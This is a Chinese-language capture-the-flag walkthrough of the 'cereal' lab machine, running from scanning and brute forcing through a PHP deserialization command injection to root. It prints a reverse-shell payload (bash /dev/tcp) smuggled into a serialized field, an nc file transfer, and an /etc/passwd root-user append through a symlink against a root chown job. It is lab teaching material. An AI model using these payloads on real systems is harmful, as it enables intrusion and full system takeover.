目录

一、主机发现

二、端口扫描

三、服务版本探测

四、端口分析

1.21 ftp

2.22 80

3.139 445 3306

4.其他端口

五、信息收集

 六、目录爆破

七、绑定域名

八、gobuster子域名爆破

九、secure.cereal.ctf

十、突破点

1.功能

2.命令注入

3.抓包解码

4.dirbuster爆破备份文件

 十一、下载备份文件并审计

十二、构造payload

十三、尝试注入

1.正常ping命令

 2.反序列化造成的rce

 3.反弹shell

十四、pspy捕捉定时进程——提权

---

一、主机发现

二、端口扫描

三、服务版本探测

四、端口分析

1.21 ftp

21端口上就是开放了ftp服务，这也是ftp默认端口，我们可以知道ftp服务器ip，还知道可以匿名登录

2.22 80

开放了常用的服务ssh和http服务

3.139 445 3306

139 445一般部署的smb服务，只是基于不同的协议。

3306 mysql数据常用端口。这里显示允许连接。

4.其他端口

至于其他端口，除了44441开放了一个http服务，剩下的没有太多有效信息，服务也都没扫出来

五、信息收集

1.80

主页面没收获

源码：接口，隐藏目录，泄露源码都没发现。无收获

2.44441

更是啥都没有

 六、目录爆破

1.80

（1）默认字典

直接扫，dir默认用common.txt跑，扫出来这些目录

 可以一个wordpress（通过其他链接进行的判断）的后台登录界面，尝试弱口令无效

（2）/blog

有个域名信息，backup备份，

 （3）phpinfo

可以了解到一些接口信息，配置文件信息，服务器语言运行环境（php）

2.44441

这里没有有效信息。

3.换个大字典跑

没有别的信息了

七、绑定域名

访问，结果还是一个Apache的默认页面。尝试去对这个域名下进行目录的爆破，根据提示，找备份文件，结果扒拉扒拉，还是一无所获。

1.80

2.44441

八、gobuster子域名爆破

gobuster vhost -u http://cereal.ctf:44441 -w /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt

这里发现了一个子域名

九、secure.cereal.ctf

 将ip和host文件进行绑定后访问，80还是和主界面一样

44441端口下部署了这样一个东西

十、突破点

1.功能

这是一个执行ping操作的接口。而且调用了操作系统的ping命令

2.命令注入

| && ;用这些尝试

尝试失败

3.抓包解码

很明显，这是一个php序列化后的数据，如何去利用这个反序列化，如何确定有没有反序列化漏洞。我们只能通过代码审计来确定是否存在反序列化漏洞，来构造payload。

4.dirbuster爆破备份文件

（1）备份文件可能文件名

.svn .git

尝试失败

（2）备份目录爆破

结果出来有一个back_en路径，这一看就是备份文件路径

 （3）备份文件

选用seclists下的conmon.txt来进行爆破，200状态正常

 十一、下载备份文件并审计

1.index.php.bak文件

这就是后端的代码

十二、构造payload

找一个php在线网站来执行就可

<?php
    class pingTest {
        public $ipAddress = "192.168.0.106";
        public $isValid = True;
}
$obj = NEW pingTest;
$serilaze= serialize($obj);
echo urlencode($serilaze);
 
?>

十三、尝试注入

1.正常ping命令

 2.反序列化造成的rce

在源码部分可以看到id命令执行成功执行

 3.反弹shell

bash -i >& /dev/tcp/192.168.0.106/5555 0>&1

<?php
    class pingTest {
        public $ipAddress = "192.168.0.106;bash -i >& /dev/tcp/192.168.0.106/5555 0>&1 ";
        public $isValid = True;
}
$obj = NEW pingTest;
$serilaze= serialize($obj);
echo urlencode($serilaze);
 
?>

突破边界，反弹成功：

十四、pspy捕捉定时进程——提权

总结：在前面的学习中，我们学到了很多的提权手段，内核漏洞，suid权限继承，sudo 权限的配置，motd注入，缓冲区溢出，利用redis未授权，用mysql写入公钥，这些手段在这里都无法提权。

1.pspy进程监视软件

简述：这个软件可以在是普通用户的情况下，可以监视root生成的进程。看是否有可用于提权的进程产生。

由于目标是64位的，我们也下载一个64位的。

2.通过nc传输

nc -nvlp 4444 > pspy

nc 192.168.0.104 4444 < pspy64 -w 1

3.执行pspy

第一步给权限，后执行

我叼，啥都有，不得不说这是个系统排查的神器。

4.chown.py

我们发现了一个异常文件，尝试对其进行分析

5.权限分析

属主属组全部是root，并且我们也是可以读的。

6.查看shell源码

主要就是对后面这个文件夹下的所有文件更改属主和属组为rocky:apache,那么我们可以通过链接的方式来改掉/etc/passwd的属组和属主，我们当前是apache群组。

 

7.通过软连接修改主和组

ln参数-f：

-f 促使 ln
命令替换掉任何已经存在的目的路径。如果目的路径已经存在，而没有指定 -f
标志，ln
命令不会创建新的链接，而是向标准错误写一条诊断消息并继续链接剩下的
SourceFiles。

8.十分钟漫长等待

可以看到文件已经被改掉了

9.追加root用户

echo "mhq::0:0:root:/root:/bin/bash" >> /etc/passwd

提权成功